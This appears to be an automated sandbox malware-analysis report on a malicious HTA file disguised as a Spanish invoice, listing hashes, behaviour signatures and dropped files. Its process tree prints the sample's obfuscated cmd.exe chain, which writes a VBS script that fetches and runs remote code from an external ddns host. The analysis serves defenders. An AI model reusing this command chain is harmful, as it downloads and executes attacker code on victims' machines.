Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    122s
  • max time network
    134s
  • platform
    windows7_x64
  • resource
    win7-20231020-es
  • resource tags

    arch:x64arch:x86image:win7-20231020-eslocale:es-esos:windows7-x64systemwindows
  • submitted
    23/10/2023, 19:31

General

  • Target

    SAC160504U42_COMPROBANTE_S970919JG1_FACTURASP_332461_MARG711102MB2_gVTKufbLVo6.hta

  • Size

    48KB

  • MD5

    20420b4fa418a91a3d745e48dacc4d9c

  • SHA1

    040be9423dc01fb91ff7ea848fb9403c735f50e6

  • SHA256

    1ad8a50c9315a914fbc345837676559acae4c0d1ac42f6ce0b4354c69729a60b

  • SHA512

    327b0840fcf6e9553e3b06df13d5709a4165f284306d34e28aa46f4b5524dc870e6c5e9a4943b3c135e47ef2638df42973817d33b48b198a3e47f5066dcf4dce

  • SSDEEP

    1536:CJPY1TSoDMFKb0PBY0+HOCPY1TSoDMFKb0PBY0+HOK:CW1+oAYgPBYNs1+oAYgPBYNp

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\SAC160504U42_COMPROBANTE_S970919JG1_FACTURASP_332461_MARG711102MB2_gVTKufbLVo6.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2252
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k echo|set /p=^"ne0Yz=".":VtGoc="i":dH0Riqm="g":NMugvLu=":":GetO^">C:\\Users\\Public\\chgzgR.vbs&echo|set /p=^"bject("sCr"+VtGoc+"pt"+NMugvLu+"hT"+"Tps"+NMugvLu+"//sac1"+ne0Yz+"ddns"+ne0Yz+"net//"+dH0Riqm+"1")^">>C:\\Users\\Public\\chgzgR.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\chgzgR.vbs
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3052
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo"
        3⤵
          PID:2376
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" set /p="ne0Yz=".":VtGoc="i":dH0Riqm="g":NMugvLu=":":GetO" 1>C:\\Users\\Public\\chgzgR.vbs"
          3⤵
            PID:2364
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo"
            3⤵
              PID:2392
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("sCr"+VtGoc+"pt"+NMugvLu+"hT"+"Tps"+NMugvLu+"//sac1"+ne0Yz+"ddns"+ne0Yz+"net//"+dH0Riqm+"1")" 1>>C:\\Users\\Public\\chgzgR.vbs"
              3⤵
                PID:2880
              • \??\c:\windows\SysWOW64\cmd.exe
                c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\chgzgR.vbs
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2232
                • C:\Windows\SysWOW64\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Public\chgzgR.vbs"
                  4⤵
                  • Blocklisted process makes network request
                  • Modifies system certificate store
                  PID:2816

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

            Filesize

            344B

            MD5

            d1c94b45e452b71cc5168d928a9f45d0

            SHA1

            9240b383304cd202f5b7a54f139ca9e422642cff

            SHA256

            e1b906ebc32db47fe9ab1ca80c5973b573905c02a485b5e362914f1099d38552

            SHA512

            fd35bc966a31919ba37f52c551a08c1570bc1a01782bf4ea8c32cf640baed79da1db1ca318cb93a056da2206e2dd25d9423799719924f733d9bc07801cefbfa5

          • C:\Users\Admin\AppData\Local\Temp\CabE764.tmp

            Filesize

            61KB

            MD5

            f3441b8572aae8801c04f3060b550443

            SHA1

            4ef0a35436125d6821831ef36c28ffaf196cda15

            SHA256

            6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

            SHA512

            5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

          • C:\Users\Admin\AppData\Local\Temp\TarE7B5.tmp

            Filesize

            163KB

            MD5

            9441737383d21192400eca82fda910ec

            SHA1

            725e0d606a4fc9ba44aa8ffde65bed15e65367e4

            SHA256

            bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

            SHA512

            7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

          • C:\Users\Public\chgzgR.vbs

            Filesize

            48B

            MD5

            3f15f304a45c2a4a01c7d3f6133308c8

            SHA1

            712d0760f64cd27bbbd4d6293f3dbe4a8b00e9e7

            SHA256

            824ede3d62f85f05463e4628a016cda3e497bdac5c89736251f7782b487b5431

            SHA512

            2f36ffc05472674852f42679438702df6dbcc87372360e8d7dde251d92919728917b9da8bbfa99b4ce855122e899342615c03af01f1392b882712749e9b05e7d

          • C:\Users\Public\chgzgR.vbs

            Filesize

            146B

            MD5

            a735c14e93a0b91011ad7d5c618117f9

            SHA1

            bb91f5a893d3b23b1696fba79e27ea728a9374af

            SHA256

            32fc1d2002831c9c6d995d34c8e306447c5ed3b8d079a1a274dda886fa11107c

            SHA512

            3062d9867980f78b5567bd63e1c57f7ad2599158025997fc09668db51639c2afaa97730e8b531e7ed655f00dad3185a5397fe9a4faa966fee0a1cb373df29ddd